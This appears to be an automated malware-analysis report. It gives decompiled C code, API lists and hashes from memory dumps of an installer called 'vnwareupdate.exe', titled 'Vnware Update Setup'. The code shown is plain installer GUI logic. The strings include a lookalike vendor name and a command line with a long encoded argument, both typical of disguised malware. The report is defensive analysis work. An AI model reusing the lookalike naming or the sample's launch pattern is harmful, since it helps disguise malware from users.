0x00407188
0x0040718d
0x0040719c
0x004071a4
0x004071a9
0x004071cd
0x004071d5
0x004071d9
0x004071df
0x004071ab
0x004071b9
0x004071bc
0x004071c2
0x004071c2
0x004071e3
0x0040719e
0x0040719e
0x0040719e
0x004071f4
0x004071f8
0x00407204
0x004071ff
0x00407202
0x00407202
0x0040720c
0x00407211
0x00407219
0x00407215
0x00407217
0x00407217
0x0040721f
0x00407221
0x00407228
0x00407232
0x0040723c
0x00407258
0x0040725c
0x004070a1
0x004070a7
0x004070a8
0x004070aa
0x004070b0
0x004070b3
0x00000000
0x00000000
0x00000000
0x004070b3
0x00000000
0x00000000
0x00000000
0x00000000
0x0040723e
0x0040723e
0x0040723e
0x00407243
0x0040724c
0x00407255
0x00000000
0x00407255
0x00407262
0x00407262
0x00407265
0x0040726c
0x0040726f
0x00000000
0x00407092
0x00407012
0x00407014
0x00407014
0x00407018
0x0040701b
0x0040701c
0x0040701c
0x00000000
0x00407014
0x00406f88
0x00406f8e
0x00000000

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
Instruction ID: bf128a229d130661f6540426524f772d2f37fab74758cf72108bd9da8b00e916
Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
Instruction Fuzzy Hash: 22C15931E042599BCF14CF68D4905EEB7B2FF89314F25826AD8567B380D738A942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00403B6B, Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403B6B(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a858 = _t35;
					if(_t116 == 0x110) {
						 *0x42f408 = _t126;
						 *0x42a86c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429838 = _t92;
						E0040403F(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ebe8);
						 *0x42ebcc = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a858 = 1;
					}
					_t123 =  *0x40a1dc; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f440;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E0040408B(0x40b);
						while(1) {
							_t37 =  *0x42a858;
							 *0x40a1dc =  *0x40a1dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1dc; // 0xffffffff
							__eflags = _t39 -  *0x42f444;
							if(_t39 ==  *0x42f444) {
								E0040140B(1);
							}
							__eflags =  *0x42ebcc - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x42f444; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E00405FC2(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E0040403F(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E0040403F(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E0040403F(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4ac - _t134;
							_v32 = _t49;
							if( *0x42f4ac != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E00404061(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429838, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4ac - _t134;
							if( *0x42f4ac == _t134) {
								_push( *0x42a86c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429838);
							}
							E00404074();
							E00405FA0(0x42a870, E00403B4C());
							E00405FC2(0x42a870, _t126, _t131,  &(0x42a870[lstrlenA(0x42a870)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a870);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ebd8);
									 *0x42a048 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f400,  *_t131 +  *0x42ebe0 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ebd8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E0040403F(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ebd8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ebcc - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ebd8, 8);
									E0040408B(0x405);
									goto L58;
								}
								__eflags =  *0x42f4ac - _t134;
								if( *0x42f4ac != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4a0 - _t134;
								if( *0x42f4a0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebd8);
						 *0x42f408 = _t134;
						EndDialog(_t126,  *0x429c40);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ebd8, 0x40f, 0, 1);
						__eflags =  *0x42ebcc - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a850, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a850,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E004040A6(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ebd8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4ac - _t134;
										if( *0x42f4ac == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c40 = 1;
											L21:
											_push(0x78);
											L22:
											E00404018();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c40 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1dc - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ebd8);
						 *0x42ebd8 = _a12;
						L58:
						if( *0x42b870 == _t134) {
							_t143 =  *0x42ebd8 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b870 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403b74
0x00403b7d
0x00403cbe
0x00403cc2
0x00403cc6
0x00403cc8
0x00403ccd
0x00403cd8
0x00403ce3
0x00403ce8
0x00403cea
0x00403cec
0x00403cef
0x00403cf4
0x00403d02
0x00403d0f
0x00403d16
0x00403d16
0x00403d17
0x00403d17
0x00403d1c
0x00403d22
0x00403d29
0x00403d2f
0x00403d31
0x00403d71
0x00403d76
0x00403d7b
0x00403d7b
0x00403d80
0x00403d89
0x00403d8b
0x00403d90
0x00403d96
0x00403d9a
0x00403d9a
0x00403d9f
0x00403da5
0x00000000
0x00000000
0x00403db0
0x00403db6
0x00000000
0x00000000
0x00403dbf
0x00403dc7
0x00403dcc
0x00403dcf
0x00403dd5
0x00403dda
0x00403ddd
0x00403de3
0x00403de8
0x00403deb
0x00403df1
0x00403df9
0x00403dff
0x00403e05
0x00403e09
0x00403e10
0x00403e10
0x00403e10
0x00403e1a
0x00403e2c
0x00403e38
0x00403e3d
0x00403e47
0x00403e4d
0x00403e4f
0x00403e54
0x00403e51
0x00403e51
0x00403e51
0x00403e64
0x00403e7c
0x00403e7e
0x00403e84
0x00403e99
0x00403e86
0x00403e8f
0x00403e91
0x00403e91
0x00403e9f
0x00403eb0
0x00403ec1
0x00403ec8
0x00403ece
0x00403ed2
0x00403ed7
0x00403ed9
0x00000000
0x00403edf
0x00403edf
0x00403ee1
0x00000000
0x00000000
0x00403ee7
0x00403eeb
0x00403f10
0x00403f16
0x00403f1c
0x00403f1e
0x00000000
0x00000000
0x00403f44
0x00403f4a
0x00403f4c
0x00403f51
0x00000000
0x00000000
0x00403f57
0x00403f5a
0x00403f5d
0x00403f74
0x00403f80
0x00403f99
0x00403f9f
0x00403fa3
0x00403fa8
0x00403fae
0x00000000
0x00000000
0x00403fb8
0x00403fc3
0x00000000
0x00403fc3
0x00403eed
0x00403ef3
0x00000000
0x00000000
0x00403ef9
0x00403eff
0x00000000
0x00000000
0x00000000
0x00403f05
0x00403ed9
0x00403fd0
0x00403fdc
0x00403fe3
0x00000000
0x00403d33
0x00403d33
0x00403d36
0x00403d69
0x00403d69
0x00403d6b
0x00000000
0x00000000
0x00000000
0x00403d6b
0x00403d38
0x00403d3c
0x00403d41
0x00403d43
0x00000000
0x00000000
0x00403d53
0x00403d5b
0x00000000
0x00403d61
0x00403b8f
0x00403b8f
0x00403b93
0x00403b98
0x00403ba7
0x00403ba7
0x00403bb0
0x00403bb9
0x00403bc4
0x00403bc4
0x00403bd0
0x00403bec
0x00403bef
0x00403c02
0x00403c08
0x00403cab
0x00000000
0x00403cb4
0x00403c0e
0x00403c1b
0x00403c1d
0x00403c1f
0x00403c3e
0x00403c3e
0x00403c41
0x00403c46
0x00403c49
0x00403c59
0x00403c5a
0x00403c5c
0x00403c92
0x00403ca5
0x00000000
0x00403ca5
0x00403c5e
0x00403c64
0x00403c7d
0x00403c82
0x00403c84
0x00000000
0x00000000
0x00403c86
0x00403c72
0x00403c72
0x00403c74
0x00403c74
0x00000000
0x00403c74
0x00403c67
0x00403c6c
0x00000000
0x00403c6c
0x00403c4b
0x00403c51
0x00000000
0x00000000
0x00403c53
0x00000000
0x00403c53
0x00403c43
0x00000000
0x00403c43
0x00403c29
0x00403c30
0x00403c36
0x00403c38
0x00000000
0x00000000
0x00000000
0x00403c38
0x00403bf4
0x00000000
0x00403bd2
0x00403bd8
0x00403be2
0x00403fe9
0x00403fef
0x00403ff1
0x00403ff7
0x00403ffc
0x00404002
0x00404002
0x00403ff7
0x0040400c
0x00000000
0x0040400c
0x00403bd0

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BA7
ShowWindow.USER32(?), ref: 00403BC4
DestroyWindow.USER32 ref: 00403BD8
SetWindowLongA.USER32 ref: 00403BF4
GetDlgItem.USER32 ref: 00403C15
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C29
IsWindowEnabled.USER32(00000000), ref: 00403C30
GetDlgItem.USER32 ref: 00403CDE
GetDlgItem.USER32 ref: 00403CE8
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403D02
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D53
GetDlgItem.USER32 ref: 00403DF9
ShowWindow.USER32(00000000,?), ref: 00403E1A
EnableWindow.USER32(?,?), ref: 00403E2C
EnableWindow.USER32(?,?), ref: 00403E47
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E5D
EnableMenuItem.USER32 ref: 00403E64
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E7C
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E8F
lstrlenA.KERNEL32(0042A870,?,0042A870,00000000), ref: 00403EB9
SetWindowTextA.USER32(?,0042A870), ref: 00403EC8
ShowWindow.USER32(?,0000000A), ref: 00403FFC

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: f28a66a0d7b9129856a2e3a49e044433d573e82c372ccead841a979cc75b8fa5
Instruction ID: 5f88be39a50f3dd075596c1c1d09af532afca629c850b085fe9e60943a8810da
Opcode Fuzzy Hash: f28a66a0d7b9129856a2e3a49e044433d573e82c372ccead841a979cc75b8fa5
Instruction Fuzzy Hash: B7C19171604605ABEB206F62DE45E2B3FBCEB4570AF40053EF642B11E1CB799942DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 004041AA, Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 202
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004041AA(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x42983c =  *0x42983c + 1;
								__eflags =  *0x42983c;
							}
							L25:
							_t110 = _a16;
							L26:
							return E004040A6(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x42e3a0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									E0040444E(_a4, _v8);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f408, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f408, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x42983c; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t112 =  *0x42a048 + 0x14;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E00404061(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E0040442A();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x42ebdc; // 0x546847
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x42f458;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E00404175;
					E0040403F(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E0040403F(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E00404061( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E00404074(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x42f414 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x42983c = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x42983c = 0;
					return 0;
				}
			}

0x004041ba
0x004042cc
0x004042df
0x0040433b
0x0040433b
0x0040433f
0x00404405
0x0040440c
0x0040440e
0x0040440e
0x0040440e
0x00404414
0x00404414
0x00404417
0x00000000
0x0040441e
0x0040434d
0x0040434f
0x00404352
0x00404359
0x0040435b
0x00404362
0x00404364
0x00404367
0x0040436a
0x0040436f
0x00404375
0x00404378
0x0040437f
0x0040438d
0x004043a5
0x004043a7
0x004043af
0x004043be
0x004043c0
0x004043c0
0x0040437f
0x00404362
0x004043c3
0x004043ca
0x00000000
0x004043cc
0x004043cc
0x004043d3
0x00000000
0x00000000
0x004043d5
0x004043d9
0x004043ea
0x004043ea
0x004043ec
0x004043f0
0x004043fe
0x004043fe
0x00000000
0x00404402
0x004043ca
0x004042e7
0x004042ea
0x00000000
0x00000000
0x004042f2
0x004042f8
0x00000000
0x00000000
0x00404304
0x00404307
0x0040430a
0x00000000
0x00000000
0x0040432d
0x0040432d
0x0040432f
0x00404331
0x00404336
0x00000000
0x004041c0
0x004041c0
0x004041c3
0x004041c8
0x004041ca
0x004041d9
0x004041d9
0x004041e0
0x004041e3
0x004041e5
0x004041ea
0x004041f3
0x004041f9
0x00404205
0x00404208
0x00404211
0x00404216
0x00404219
0x0040421e
0x00404235
0x0040423c
0x0040424f
0x00404252
0x00404267
0x0040426e
0x00404273
0x00404278
0x00404278
0x00404287
0x00404296
0x004042a8
0x004042ad
0x004042bd
0x004042bf
0x00000000
0x004042c5

APIs

CheckDlgButton.USER32 ref: 00404235
GetDlgItem.USER32 ref: 00404249
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404267
GetSysColor.USER32(?), ref: 00404278
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404287
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404296
lstrlenA.KERNEL32(?), ref: 00404299
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042A8
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042BD
GetDlgItem.USER32 ref: 0040431F
SendMessageA.USER32(00000000), ref: 00404322
GetDlgItem.USER32 ref: 0040434D
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040438D
LoadCursorA.USER32 ref: 0040439C
SetCursor.USER32(00000000), ref: 004043A5
LoadCursorA.USER32 ref: 004043BB
SetCursor.USER32(00000000), ref: 004043BE
SendMessageA.USER32(00000111,00000001,00000000), ref: 004043EA
SendMessageA.USER32(00000010,00000000,00000000), ref: 004043FE

Strings

GhT, xrefs: 004041CA
N, xrefs: 0040433B
uA@, xrefs: 004043A9
"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD, xrefs: 00404378

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: "C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD$GhT$N$uA@
API String ID: 3103080414-1164609258
Opcode ID: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
Instruction ID: fd9e69a661c90447e44b9af037de2c0158a1a23ec1d513a6b2b78bd76040a697
Opcode Fuzzy Hash: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
Instruction Fuzzy Hash: A26183B1A00205BFDB109F61DD45F6A7B69EB84705F10803AFB057A1D1C7B8A951CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f414;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Vnware Update Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f408;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Vnware Update Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Vnware Update Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Vnware Update Setup
API String ID: 941294808-4047791761
Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
